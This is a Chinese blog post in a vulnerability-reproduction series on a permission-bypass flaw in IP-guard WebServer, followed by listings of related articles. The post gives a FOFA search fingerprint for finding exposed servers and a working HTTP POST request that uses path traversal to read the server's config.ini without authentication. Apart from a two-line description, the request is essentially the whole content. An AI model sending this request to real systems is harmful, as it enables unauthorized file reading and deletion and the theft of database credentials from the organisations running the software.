【漏洞复现】IP-guard WebServer 权限绕过漏洞

最新推荐文章于 2024-05-07 23:10:34 发布
最新推荐文章于 2024-05-07 23:10:34 发布
阅读量359 收藏
点赞数 6
分类专栏: 漏洞复现 文章标签: tcp/ip 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/138253090
版权

0x01 产品简介

IP-guard WebServer 是 IP-guard 网络安全管理系统的一部分,用于提供 Web 界面以进行用户权限管理、监控和审计。

0x02 漏洞概述

IP-guard WebServer的权限验证机制中存在设计缺陷,未授权的攻击者能够规避安全验证,通过后端接口执行文件的任意读取和删除操作。

0x03 测绘语句

fofa: icon_hash="2030860561"

0x04 漏洞复现

POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1

Host:

Content-Type: application/x-www-form-urlencoded



path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

0x05 影响范围

IP-guard Web
了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
订阅专栏
IP-guard WebServer 任意文件读取漏洞复现
0xSec
04-04 612
由于IP-guard WebServer/ipg/static/appr/lib/flexpaper/php/view.php接口处未对用户输入的数据进行严格的校验和过滤。未经身份验证的攻击者可随意操纵doc参数读取系统内部配置文件造成信息泄露,使系统处于极不安全的状态。
IP-guard WebServer 权限绕过漏洞复现(QVD-2024-14103)
0xSec
04-18 791
2024年4月,互联网上披露IP-guardWebServer权限绕过漏洞情报,攻击者可利用该漏洞读取配置文件,获取数据库权限。该漏洞利用简单,建议受影响的客户尽快修复漏洞
IP-guard WebServer 权限绕过漏洞复现(202404)
weixin_43689708的博客
04-19 778
IP-guard 是由广州市溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
IP-guard WebServer RCE漏洞复现
0xSec
11-09 2705
IP-guard WebServer存在远程命令执行漏洞情报。攻击者可利用该漏洞执行任意命令,获取服务器控制权限
IP-guard WebServer 远程命令执行漏洞复现(0day)】
一纸荒芜的博客
11-10 2806
IP-guard Webserver远程命令执行漏洞(RCE)漏洞复现
IP-Guard文件加密权限设置(实例一).docx
03-25
A公司代理某品牌产品,有销售部、财务部、行政部,现有如下需求: ...员工不能随意将重要文件提供给公司以外的人,需要经过部门主管审批,而且必须控制权限,防止二次泄密。 服务器出现意外故障客户端仍能够正常工作。
IP-guard 双机热备使用说明
10-10
双机热备使用说明 一、简介 服务器双机热备功能把主从服务器、数据库分别部署到 3 台机器上,实现主-从服务器 共享一个数据库,并且保持三者之间的通讯。当主服务器出现故障时,从服务器能及时响应 ...
IP-guard产品测试用例(全模块).pdf
02-14
IP-guard桌面管理系统,运用全面而细致地从文档操作管理、即时通讯、邮件管控、资产管理、移动存储设备、上网行为管理、屏幕监控、系统管理等方面进行详尽细致审计、全面严格管控和安全稳定的加密,满足企业防止信息...
IP-Guard初级工程师认证培训资料
01-08
IP-guard企业信息监管系统,是一款领先的内网安全软件,它能够协助企业解决最棘手的内网安全问题,借助IP-guard强大的功能,企业能够有效地进行用户行为管理,防范信息外泄,文档透明加密,敏感内容识别管理系统DLP...
IP-Guard的LINUX客户端用户手册.pdf
04-08
连着同一台服务器的linux与windows客户端,2者之间的密文可通用,即在windows加密客户端上编辑的代码(密文),拿到linux加密客户端机器上也可编译;linu加密客户端上编译生成的密文,在windows加密客户端下也可正常...
IP:Internet Protocol,子网(Subnets),IPv6:动机,层次编址:路由聚集(rout aggregation)】
最新发布
forever_youyang的博客
05-07 545
回来的时候将机构IP地址(外网)换成内网地址:这里就会有问题,内网不会允许随便一个外网来访问自己。CIDR:Classless InterDomain Routing(无类域间路由)将v4携带v6的分组,通过隧道传,然后将v6取出来,最后慢慢的就变成了v6。将子网前缀都发给他,然后他做一个聚集,再给下一跳。出去的时候将源地址换成机构IP地址(外网)外网的IP/端口号代替内网的IP/端口号。从ISP获得地址块中分配的一小块地址块。一个ISP如何获得一个地址块?如何获得一个网络的子网部分?
首页最新 多IP浏览器防关联:如何配置多个独立且稳定的IP地址?
yugekuajing的博客
04-30 798
在互联网时代,IP地址的重要性不言而喻。然而,IP关联问题却成为一项令人担忧的隐私和安全挑战。针对这个问题,多IP浏览器是一种解决方案,可以帮助用户单独配置多个独立且稳定的IP地址,有效地防止IP关联。
传输层协议,TCP(2)
m0_74876421的博客
05-02 1038
TCP协议:流量控制、拥塞控制、延时应答、捎带应答等
Python-Socket编程实现tcp-udp通信
2301_79578379的博客
05-01 409
Python-Socket-UDP传输视频(客户端&服务端)
【Ping】Windows 网络延迟测试 ping 、telnet、tcping 工具
原小明
05-06 213
telnet命令,属于应用层的协议,用于远程登录,也可用于检测IP的端口状态。但是功能有限,只能检测一时的IP端口状态,无法查看ping值,也无法实时监控。tcping命令使用传输层协议,可以检测IP端口状态和查看ping 值,即使源地址禁 ping 也可以通过 tcping 来监控服务器网络状态。属于网络层的ICMP协议,只能检查 IP 的连通性或网络连接速度, 无法检测IP的端口状态。下载后 将 tcping.exe 放入 system32 文件夹。如果进行等待界面,说明连通了,否则异常。
【XR806开发板试用】XR806与鸿蒙,创建任务,串口转发TCPServer收到的数据
weixin_47569031的博客
05-06 347
【XR806开发板试用】XR806与鸿蒙,创建任务,串口转发TCPServer收到的数据
ip-guard文件加密权限设置(实例一).docx
08-09
"ip-guard文件加密权限设置(实例一).docx" 是一个文件加密权限设置的实例文档。 文件加密是一种保护文件内容安全的方法,可以确保只有授权人员才能访问和查看文件内容。ip-guard是一个文件加密软件,它提供了一套丰富的加密权限设置,可以帮助用户更好地保护文件。 在实例一中,ip-guard文件加密权限设置的目标是对一个名为"ip-guard文件加密权限设置(实例一).docx"的文件进行加密和权限设置。具体操作过程如下: 首先,打开ip-guard软件,并登录到管理员账户。管理员账户具有最高权限,可以进行文件加密和权限设置。 然后,在软件界面上找到"文件加密权限设置"功能。点击该功能以进入设置界面。 接下来,通过浏览文件功能,找到并选择要加密和权限设置的文档:"ip-guard文件加密权限设置(实例一).docx"。 在设置界面中,可以设置不同的加密级别和权限设置。加密级别可以根据安全需求选择低、中、高三个级别,高级别会使用更强的加密算法。权限设置可以控制谁可以访问、修改、打印、复制等操作。 根据具体需求,选择适当的加密级别和权限设置。可以为不同的用户或用户组设置不同的权限。 最后,点击确认或应用按钮进行设置保存。ip-guard软件会将设置应用到"ip-guard文件加密权限设置(实例一).docx"文件上,使其具有相应的加密和权限保护。 通过以上步骤,"ip-guard文件加密权限设置(实例一).docx"文件就成功进行了加密和权限设置。只有经过授权的人员才能访问、修改或打印该文件,有效保护文件的内容安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值